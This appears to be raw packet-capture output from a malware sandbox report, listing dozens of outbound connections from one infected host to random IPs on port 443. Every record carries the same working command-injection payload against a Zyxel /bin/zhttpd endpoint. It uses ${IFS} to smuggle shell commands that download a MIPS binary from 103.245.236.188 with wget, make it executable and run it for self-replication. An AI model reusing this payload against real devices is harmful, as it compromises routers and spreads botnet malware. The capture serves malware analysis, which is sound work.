                                                Jan 12, 2024 18:24:21.498207092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                833192.168.2.133892261.205.230.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498270988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                834192.168.2.135679682.249.66.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498337984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                835192.168.2.1354530170.208.18.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498366117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                836192.168.2.1353014195.93.175.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498420954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                837192.168.2.133375497.162.181.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498481035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                838192.168.2.13516245.202.45.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498528957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                839192.168.2.1358966203.253.223.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498596907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                840192.168.2.1357208155.171.160.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498644114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                841192.168.2.134676824.162.193.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498739958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                842192.168.2.1344244180.119.143.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498806953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                843192.168.2.1339530147.7.179.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498833895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                844192.168.2.1356162183.137.194.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498924017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                845192.168.2.1333894138.253.208.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498999119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                846192.168.2.133674499.211.223.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499056101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                847192.168.2.135773638.161.114.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499119043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                848192.168.2.1353716128.34.154.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499159098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                849192.168.2.1341696194.32.198.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499212027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                850192.168.2.1350754144.215.147.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499269962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                851192.168.2.134504248.206.182.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499316931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                852192.168.2.134489449.250.200.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499386072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                853192.168.2.1348720205.62.254.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499447107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                854192.168.2.1336006116.53.38.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499505043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                855192.168.2.134084891.52.0.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499566078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                856192.168.2.133955413.70.163.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499639034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                857192.168.2.133366098.106.228.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499670982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                858192.168.2.1353996116.176.5.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499722958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                859192.168.2.1352374141.229.47.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499777079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                860192.168.2.1358604187.30.237.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499809980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                861192.168.2.1336480196.153.175.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499852896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                862192.168.2.1341840159.146.182.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499924898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                863192.168.2.1345998120.23.193.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.499958038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                864192.168.2.1345248186.215.236.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500010014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                865192.168.2.135946896.144.85.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500057936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                866192.168.2.1340462134.222.205.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500117064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                867192.168.2.1359836211.195.71.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500173092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                868192.168.2.1343914107.103.72.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500216007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                869192.168.2.1359348121.39.162.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500236034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                870192.168.2.1339276159.221.150.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500291109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                871192.168.2.1351802106.158.145.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500332117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                872192.168.2.134627075.86.162.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500391006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                873192.168.2.1356164140.67.134.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500449896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                874192.168.2.1358240164.103.178.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500502110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                875192.168.2.135728459.119.204.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500552893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                876192.168.2.1342138107.126.211.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500602007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                877192.168.2.134115078.64.153.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500663042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                878192.168.2.134111038.166.104.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500689983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                879192.168.2.134150819.235.178.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500752926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                880192.168.2.133983858.244.105.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500802040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                881192.168.2.1338206120.231.191.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500864029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                882192.168.2.134945045.9.39.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500925064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                883192.168.2.134234420.14.198.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.500969887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                884192.168.2.134088052.106.12.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501008987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                885192.168.2.135723020.212.188.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501055002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                886192.168.2.1338290182.26.27.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501120090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                887192.168.2.1339986161.56.74.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501183033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                888192.168.2.133961463.108.50.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501221895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                889192.168.2.135944075.183.7.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501285076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                890192.168.2.1336012179.96.240.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501347065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                891192.168.2.1341530149.67.24.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501389027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                892192.168.2.1337814103.169.50.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501446962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                893192.168.2.1356816162.60.51.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501519918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                894192.168.2.1355338125.172.30.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501562119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                895192.168.2.1344790219.83.249.76443
                                                TimestampBytes transferredDirectionData
